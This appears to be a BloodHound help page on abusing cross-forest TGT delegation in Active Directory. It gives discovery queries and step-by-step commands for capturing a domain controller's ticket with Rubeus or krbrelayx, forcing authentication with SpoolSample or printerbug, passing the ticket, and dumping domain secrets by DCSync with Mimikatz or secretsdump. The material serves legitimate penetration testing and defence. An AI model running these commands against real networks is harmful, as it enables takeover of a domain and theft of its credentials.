The trust from the target node domain to the source node domain has TGT delegation enabled.

When a resource in the source node domain is configured with unconstrained delegation, principals from the target node domain will automatically forward their Ticket Granting Ticket (TGT) to that resource upon access.

Abuse Info

TGT delegation allows an attacker to capture TGTs of privileged users or computers in the target domain when they authenticate against a system configured with unconstrained delegation.

A common attack method involves the attacker logging into a DC of the source domain and coercing a DC of the target domain. Since DCs have unconstrained delegation enabled by default, this grants the attacker a TGT for a target domain DC, which can then be used to perform a DCSync attack on the target domain. This guide details that version of the attack.

Alternatively, attackers can target other privileged computers or users besides DCs.

The attack will fail if the target is a member of Protected Users or is marked as not trusted for delegation, as their TGTs will not be sent to hosts with unconstrained delegation. You can identify all protected principals using the following Cypher query in BloodHound:

MATCH (g:Group)

WHERE g.objectid ENDS WITH "-525"

MATCH (n:Base)

WHERE n.sensitive = TRUE OR (n)-[:MemberOf*..]->(g)

RETURN n

LIMIT 1000

Attackers can also exploit non-DC hosts or users in the source domain with unconstrained delegation enabled. To find all non-DC principals with unconstrained delegation in BloodHound, run:

MATCH (n:Base)

WHERE n.unconstraineddelegation = TRUE AND NOT (n)-[:DCFor]->()

RETURN n

Attack

Step 1: Start Monitoring for TGTs

Windows:

Log into a DC of the source domain and open a command prompt as Administrator.

Start monitoring for incoming TGTs using Rubeus:

Rubeus.exe request monitor /user:targetdc.domain.local /interval:5 /nowrap

Linux:

Obtain credentials for a computer or user with unconstrained delegation.

Start monitoring for incoming TGTs using krbrelayx.py with the credentials of the unconstrained delegation account:

krbrelayx.py -aesKey 9ff86898afa70f5f7b9f2bf16320cb38edb2639409e1bc441ac417fac1fed5ab

Step 2: Coerce the Target DC

The printer bug is abused in this example. If the Print Spooler service is disabled on the target host, alternative coercion techniques must be used. See “Windows Coerced Authentication Methods” under References for details.

To coerce the target DC, Authenticated Users access is required in the target domain. If the trust relationship is bidirectional, all principals in the source domain have this access by default. If not, coercion must be executed as a principal from the target forest. Attackers can obtain such a session using the trust account attack. See “SID Filter as a Security Boundary Between Domains? (Part 7) - Trust Account Attack” under References for details.

Windows:

From any host in the domain, coerce the target DC using SpoolSample:

SpoolSample.exe targetdc.domain.local compromiseddc.otherdomain.local

Rubeus will print the DC TGT as soon as it is received.

Linux:

Coerce the target DC using printerbug.py:

printerbug.py '<domain>/<username>:<password>'@<target DC IP> <compromised DC IP>

krbrelayx.py will save the received TGT to disk.

Step 3: Pass the Ticket

Windows:

Inject the DC TGT into memory using Rubeus:

Rubeus.exe ptt /ticket:doIFvjCCBbqgAwI...

Linux:

Set the KRB5CCNAME environment variable to the ticket’s path:

export KRB5CCNAME=$path_to_ticket.ccache

Step 4: DCSync the Target Domain

Windows:

Use Mimikatz to DCSync the target domain from the machine where the DC TGT was injected:

lsadump::dcsync /domain:domain.local /user:DOMAIN\Administrator

Linux:

Use secretsdump.py to DCSync the target domain:

secretsdump.py -k -just-dc-user <DOMAIN/targetuser> <target DC DNS name>

Opsec Considerations

The attack can be detected by correlating Windows security events from the attacker-controlled host and the target. See the reference “Hunting in Active Directory: Unconstrained Delegation & Forests Trusts” for details.

References